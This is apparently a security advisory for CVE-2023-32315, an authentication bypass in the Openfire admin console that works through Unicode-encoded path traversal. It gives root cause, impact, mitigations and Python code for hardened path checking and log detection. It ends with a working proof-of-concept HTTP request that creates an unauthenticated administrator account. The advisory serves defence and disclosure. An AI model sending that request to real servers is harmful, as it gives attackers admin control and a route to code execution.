Vulnerable Version
version 4.7.4 and 4.6.7
Fixed Version
version 4.7.5, 4.6.8
Base Score
7.5 High
Vendor Description:
Openfire is an open-source XMPP (Jabber) server used for real-time messaging and collaboration. It is written in Java and provides features like user authentication, group chat, and plugin support. Openfire is widely used for internal corporate chat systems and integrates with LDAP, databases, and third-party tools. It has a web-based Admin Console for easy configuration and management. Due to its open nature, Openfire is commonly deployed in self-hosted environments for secure messaging.
CVE-2023-32315 Vulnerability Description
A path traversal vulnerability, CVE-2008-6508, was discovered in the Openfire admin console over a decade ago. Attackers could use the path /setup/setup-/../../[page].jsp to bypass the authentication checks and reach any admin page without knowing the admin username and password.
Since then, path traversal protections have been in place to defend against exactly this type of attack.
A later version of the embedded webserver added support for non-standard URL encoding of UTF-16 characters. The path traversal protections in Openfire have not been updated to protect against this new encoding. As a result, attackers can once again defeat the path traversal protection by using /setup/setup-/%u002e%u002e/%u002e%u002e/[page].jsp.
Root Cause
The vulnerability occurs because:
- Incomplete Path Traversal Protections: Openfire's setup endpoint implements protections against traditional path traversal sequences (e.g., ../), but these protections do not account for Unicode-encoded representations of the same sequences.
- Improper Input Sanitization: The server does not properly decode and sanitize Unicode-encoded input before processing it, allowing attackers to bypass restrictions.
Impact of CVE-2023-32315
- Attackers can steal user data, chat logs, credentials, and other stored information.
- Attackers can directly access Openfire’s Admin Console without authentication.
- Since admin access allows plugin management, an attacker can upload malicious plugins or manipulate settings to execute arbitrary code.
Mitigation
- Patch: Upgrade to Openfire version 4.7.5, 4.6.8, or later, where this vulnerability has been fixed.
- Input Sanitization: Decode and sanitize all input, including Unicode-encoded sequences, before applying path traversal checks.
- Access Control: Restrict access to the /setup/ pages to trusted IP addresses or networks.
- File Permissions: Ensure sensitive files are stored outside the web root or have restricted permissions.
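The root cause and the "decode before checking" mitigation above can be shown side by side. The following is an added illustration written for this advisory, not Openfire's own code (Openfire is Java; Python is used here for brevity): a check that canonicalises the still-encoded path lets %u002e%u002e through, while a check that decodes %uXXXX and %XX escapes first does not. The log format, IP addresses and request lines are constructed samples, and the two `is_setup_page` functions are hypothetical names for the two behaviours.

```python
import re
from posixpath import normpath

# Openfire exempts /setup/ from admin authentication, so the security-relevant
# question is whether the request path, once fully decoded, still lies under it.
SETUP_PREFIX = "/setup/"

_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")  # non-standard %uXXXX (UTF-16 code unit)
_PCT = re.compile(r"%([0-9a-fA-F]{2})")     # standard %XX

def decode_path(raw_path: str) -> str:
    """Drop the query string and decode %uXXXX / %XX escapes until the path is
    stable, so double-encoded traversal sequences are resolved as well."""
    path = raw_path.split("?", 1)[0]
    prev = None
    while path != prev:
        prev = path
        path = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), path)
        path = _PCT.sub(lambda m: chr(int(m.group(1), 16)), path)
    return path.replace("\\", "/")  # treat backslashes as separators too

def weak_is_setup_page(raw_path: str) -> bool:
    """Pre-fix style check (hypothetical): canonicalise the raw, still-encoded path.
    Classic '../' is collapsed, but '%u002e%u002e' is not seen as '..', so the
    path appears to stay inside /setup/."""
    return normpath(raw_path.split("?", 1)[0]).startswith(SETUP_PREFIX)

def hardened_is_setup_page(raw_path: str) -> bool:
    """Corrected check: decode first, then canonicalise, then test the prefix."""
    canonical = normpath(decode_path(raw_path))
    return canonical == "/setup" or canonical.startswith(SETUP_PREFIX)

def find_bypass_attempts(log_lines):
    """Detection helper: return request paths that claim /setup/ in their raw
    form but resolve outside it once decoded and canonicalised."""
    pattern = re.compile(r'\S+ \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/\S+"')
    hits = []
    for line in log_lines:
        m = pattern.match(line)
        if m and m.group(1).startswith(SETUP_PREFIX) and not hardened_is_setup_page(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /setup/index.jsp HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?username=x HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /setup/setup-s/../../user-groups.jsp HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for path in find_bypass_attempts(SAMPLE_LOG):
        print("escapes /setup/ after decoding:", path)
```

Run against a real access log, the detection helper will also surface the classic ../ form, which the old protection already blocked but which is still worth alerting on.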
POC
To exploit this issue, the first step is to create a new administrator through the following request:
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
Host: localhost:9090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf=csrftoken

Then log in to the admin console with this account; you can see that the user is already an administrator.